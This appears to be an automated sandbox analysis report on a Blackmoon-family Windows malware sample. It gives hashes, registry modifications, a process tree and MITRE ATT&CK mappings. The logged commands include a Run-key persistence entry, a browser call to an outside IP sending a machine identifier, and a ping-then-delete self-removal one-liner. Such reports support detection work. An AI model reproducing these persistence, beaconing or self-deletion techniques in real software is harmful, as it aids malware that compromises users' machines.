Analysis
-
max time kernel
106s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2025, 18:30
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe
Resource
win11-20250410-en
General
-
Target
JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe
-
Size
34KB
-
MD5
ca5b08f9fd5693eb4126738d68d6ac68
-
SHA1
a81e3488ad3cbb3232cfeada9cb8f5fafcd62078
-
SHA256
33a238742a161d7c292f77a097a9992c912bfd547b60963df9312bd827937d46
-
SHA512
09e2b7941651a39fbede3fada199df5a0a12b973ec84aa3c8f0fa97de36194ac893dc8c1579ab64fb5d694f0cd3cf628e3f6109f41318c83c68a21225f66ce17
-
SSDEEP
768:Sxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMli:bQftW0QGq/aabWrTsGx3P6Cbtr
Malware Config
Signatures
-
Blackmoon family
-
Detect Blackmoon payload 1 IoCs
resource yara_rule behavioral1/memory/3824-3-0x0000000000400000-0x0000000000431200-memory.dmp family_blackmoon -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\YouPin = "C:\\Windows\\system32\\YouPin.exe" JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\YouPin.exe JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe File opened for modification C:\Windows\SysWOW64\YouPin.exe JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2044 cmd.exe 5136 PING.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000093a53d3a8f9e6f478baf2534b57034d400000000020000000000106600000001000020000000d65f83b23472df2506e71d0c56d027d5c00c3ec319c19f08217438106a2f4134000000000e8000000002000020000000de7afcdc1217cc1593207ea8d7d737ec24f3943d5c86fbd78bd321d45c87928a200000003588b4c8cefd17755a80e06218fe3ad11fd42f04939766dda523b8fd6fc63c8d400000001329331b00ff4f8c7e9c69d50beb93442bcbc581ce90333202f4a639c2bb550a5ec4390859b371bed8f4e0665abb9ad2a9c2a0512b83fa8b1b4733cd181e807c IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "452025224" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c004c798ebb2db01 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{BFB7C8A7-1EDE-11F0-B6D4-42A920109295} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000093a53d3a8f9e6f478baf2534b57034d400000000020000000000106600000001000020000000523f06ec6d07dd5524af54d30aabb19fcafcf10f1816a6daab27a1fbbe139bff000000000e8000000002000020000000d6ac39df002435bd88a33ecafb8e8dc0dc201ebae7bc920e916c2281d50ea12220000000dd35dca95a1622a4762df69cfd10c17d094a62e701c2855914ec02a8910f863140000000d9a3a94df398d5cdac6a62f4793231ee93525bca9b91555d21098a686088c77a078b228718b0a502d8d975ab8b436f2bc2617e31bed63f7a0b817e32a52d3d52 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0ebd298ebb2db01 IEXPLORE.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5136 PING.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1584 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1584 IEXPLORE.EXE 1584 IEXPLORE.EXE 2024 IEXPLORE.EXE 2024 IEXPLORE.EXE 2024 IEXPLORE.EXE 2024 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3824 wrote to memory of 1584 3824 JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe 87 PID 3824 wrote to memory of 1584 3824 JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe 87 PID 1584 wrote to memory of 2024 1584 IEXPLORE.EXE 88 PID 1584 wrote to memory of 2024 1584 IEXPLORE.EXE 88 PID 1584 wrote to memory of 2024 1584 IEXPLORE.EXE 88 PID 3824 wrote to memory of 2044 3824 JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe 90 PID 3824 wrote to memory of 2044 3824 JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe 90 PID 3824 wrote to memory of 2044 3824 JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe 90 PID 2044 wrote to memory of 5136 2044 cmd.exe 93 PID 2044 wrote to memory of 5136 2044 cmd.exe 93 PID 2044 wrote to memory of 5136 2044 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=FD263A7D6E8D83F384585DDA2CAF7945&os=Windows 8&avs=unknow&ps=NO.&ver=jack2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1584 CREDAT:17410 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\YouPin.exe1⤵PID:2380
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize471B
MD5bdb6adbbf5fbeb7019e93fa040cf7b33
SHA10a9acc84dbd080bd78303cddd317bb08d9e33f92
SHA256b4f324b9ae951c3ca006ddad99989d67fa8ca85003e05875c3fc877c512ca81f
SHA5123ccb661af3171a6a1cb63bfcd6b9b5a76e02735285a42c82c2de58bd2c68fed45fe1238ef552371d46e584fb2ce500f1efd31baef6d979244b53c80f7009d740
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize412B
MD585268d817ab527e415ab6d839de04f78
SHA1dee9de8afb9f14b711f11d7208d11d200f2f160b
SHA2560db5205c97d51b725f59e1f0862519edd12622d64b1724b384b14089936ef9c6
SHA512a73fc1408cc2d8ea5e73a8b2b4de03312a52b0b2983d96277c5211fe949937099a05583401ada33a399f1a8eb24099e19eb06704fadf4338e93c5b0fbf9f0220
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee